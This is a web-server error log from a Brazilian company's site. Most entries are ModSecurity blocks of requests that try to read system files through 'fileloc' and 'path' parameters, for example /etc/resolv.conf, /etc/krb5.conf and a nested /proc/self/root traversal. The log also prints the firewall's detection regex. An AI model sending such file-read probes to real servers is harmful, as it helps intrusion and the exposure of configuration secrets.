[Fri Mar 20 07:40:41.811453 2026] [:error] [pid 9818:tid 140411741927168] [client 216.73.216.191:52902] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //usr/share/zoneinfo/etc/gmt-8"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0kKV1pVZ5mVmJwsFMsgQAAAEA"]
[Fri Mar 20 07:40:44.234350 2026] [:error] [pid 10189:tid 140411557287680] [client 216.73.216.191:53074] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //usr/share/zoneinfo/etc/gmt-5"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0kLDJ3M9BSuKP7CAYXJgAAAJY"]
[Fri Mar 20 07:40:45.052826 2026] [:error] [pid 10189:tid 140411632822016] [client 216.73.216.191:53124] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //usr/share/zoneinfo/etc/gmt 2"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0kLTJ3M9BSuKP7CAYXKgAAAI0"]
[Fri Mar 20 07:40:45.447193 2026] [:error] [pid 21219:tid 140411716749056] [client 216.73.216.191:53158] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //usr/share/zoneinfo/etc/gmt-4"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0kLfXLqtnMIWvjpaKWyQAAAoM"]
[Fri Mar 20 07:40:45.659712 2026] [:error] [pid 15826:tid 140411599251200] [client 216.73.216.191:53178] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //usr/share/zoneinfo/etc/gmt-7"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0kLeoXxyEfFpUF8f995gAAAVE"]
[Fri Mar 20 07:40:48.687073 2026] [:error] [pid 7893:tid 140411641214720] [client 216.73.216.191:53404] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //usr/share/zoneinfo/etc/gmt-3"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0kMBCii7xarUs8iHZkYwAAAgw"]
[Fri Mar 20 07:40:50.695336 2026] [:error] [pid 21219:tid 140411641214720] [client 216.73.216.191:53560] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //usr/share/zoneinfo/etc/gmt-9"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0kMvXLqtnMIWvjpaKW2gAAAow"]
[Fri Mar 20 07:40:55.029853 2026] [mime_magic:error] [pid 7893:tid 140411649607424] (70014)End of file found: [client 57.141.18.68:53845] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 07:40:58.340400 2026] [:error] [pid 9818:tid 140411616036608] [client 216.73.216.191:53982] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //usr/share/zoneinfo/etc/gmt0"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0kOV1pVZ5mVmJwsFMskgAAAE8"]
[Fri Mar 20 07:41:04.690883 2026] [:error] [pid 21219:tid 140411624429312] [client 216.73.216.191:54350] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //usr/share/zoneinfo/etc/gmt-2"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0kQPXLqtnMIWvjpaKW5wAAAo4"]
[Fri Mar 20 07:41:06.707566 2026] [mime_magic:error] [pid 21219:tid 140411699963648] (70014)End of file found: [client 216.73.216.191:54466] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 07:41:45.246963 2026] [:error] [pid 26799:tid 140411574073088] [client 216.73.216.191:11503] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/yum.conf.bkp-21-10-22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab0kaNa6ubjKNq_cu4bQ-gAAA1Q"]
[Fri Mar 20 07:42:00.621835 2026] [mime_magic:error] [pid 21219:tid 140411582465792] (70014)End of file found: [client 216.73.216.191:57462] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 07:42:11.443147 2026] [mime_magic:error] [pid 15826:tid 140411683178240] (70014)End of file found: [client 216.73.216.191:58122] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 07:42:34.815973 2026] [mime_magic:error] [pid 10189:tid 140411733534464] (70014)End of file found: [client 57.141.18.14:59662] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 07:43:12.011154 2026] [mime_magic:error] [pid 21219:tid 140411666392832] (70014)End of file found: [client 74.7.243.128:60072] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/sbin
[Fri Mar 20 07:44:04.500999 2026] [mime_magic:error] [pid 9818:tid 140411666392832] (70014)End of file found: [client 57.141.18.1:36588] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 07:44:22.749783 2026] [mime_magic:error] [pid 15826:tid 140411691570944] (70014)End of file found: [client 216.73.216.191:37688] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 07:44:26.229998 2026] [mime_magic:error] [pid 7235:tid 140411741927168] (70014)End of file found: [client 57.141.18.30:37858] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 07:44:54.521920 2026] [:error] [pid 7893:tid 140411616036608] [client 216.73.216.191:5749] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab0lJhCii7xarUs8iHZlYgAAAg8"]
[Fri Mar 20 07:44:54.660571 2026] [:error] [pid 7893:tid 140411607643904] [client 216.73.216.191:5749] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/sysctl.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab0lJhCii7xarUs8iHZlYwAAAhA"]
[Fri Mar 20 07:44:54.799096 2026] [:error] [pid 7893:tid 140411716749056] [client 216.73.216.191:5749] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/modules-load.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab0lJhCii7xarUs8iHZlZQAAAgM"]
[Fri Mar 20 07:44:54.863338 2026] [:error] [pid 7893:tid 140411641214720] [client 216.73.216.191:24719] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab0lJhCii7xarUs8iHZlZgAAAgw"]
[Fri Mar 20 07:44:54.937225 2026] [:error] [pid 7893:tid 140411574073088] [client 216.73.216.191:5749] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/bash_completion.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab0lJhCii7xarUs8iHZlZwAAAhQ"]
[Fri Mar 20 07:44:56.485239 2026] [:error] [pid 26799:tid 140411699963648] [client 216.73.216.191:8185] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/profile.rpmnew"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab0lJ9a6ubjKNq_cu4bRtQAAA0U"]
[Fri Mar 20 07:45:05.661796 2026] [mime_magic:error] [pid 26799:tid 140411624429312] (70014)End of file found: [client 216.73.216.191:40170] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 07:45:08.642605 2026] [mime_magic:error] [pid 10189:tid 140411607643904] (70014)End of file found: [client 216.73.216.191:40372] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 07:45:34.724127 2026] [mime_magic:error] [pid 31215:tid 140411708356352] (70014)End of file found: [client 216.73.216.191:42072] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 07:46:00.823586 2026] [mime_magic:error] [pid 7893:tid 140411582465792] (70014)End of file found: [client 57.141.18.82:43830] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 07:46:02.706525 2026] [:error] [pid 31215:tid 140411607643904] [client 216.73.216.191:44391] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/locales.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab0lagF0L0L-SsrnPo5nDAAAAtA"]
[Fri Mar 20 07:46:02.842855 2026] [:error] [pid 10189:tid 140411658000128] [client 216.73.216.191:6165] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/csh.cshrc"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab0lajJ3M9BSuKP7CAYYuAAAAIo"]
[Fri Mar 20 07:46:02.843987 2026] [:error] [pid 26799:tid 140411649607424] [client 216.73.216.191:53054] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/printcap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab0lata6ubjKNq_cu4bSAQAAA0s"]
[Fri Mar 20 07:46:02.855012 2026] [:error] [pid 31215:tid 140411599251200] [client 216.73.216.191:44391] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/rc.local"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab0lagF0L0L-SsrnPo5nDQAAAtE"]
[Fri Mar 20 07:46:02.925351 2026] [:error] [pid 10189:tid 140411666392832] [client 216.73.216.191:38284] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/resolv.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab0lajJ3M9BSuKP7CAYYuQAAAIk"]
[Fri Mar 20 07:46:02.948898 2026] [:error] [pid 15826:tid 140411733534464] [client 216.73.216.191:33496] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/yum.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab0lauoXxyEfFpUF8f9_SQAAAUE"]
[Fri Mar 20 07:46:02.967780 2026] [:error] [pid 10189:tid 140411699963648] [client 216.73.216.191:6165] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/chrony.keys"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab0lajJ3M9BSuKP7CAYYugAAAIU"]
[Fri Mar 20 07:46:02.991091 2026] [:error] [pid 26799:tid 140411733534464] [client 216.73.216.191:53054] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/krb5.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab0lata6ubjKNq_cu4bSAgAAA0E"]
[Fri Mar 20 07:46:03.075890 2026] [:error] [pid 10189:tid 140411649607424] [client 216.73.216.191:38284] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/mke2fs.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab0lazJ3M9BSuKP7CAYYuwAAAIs"]
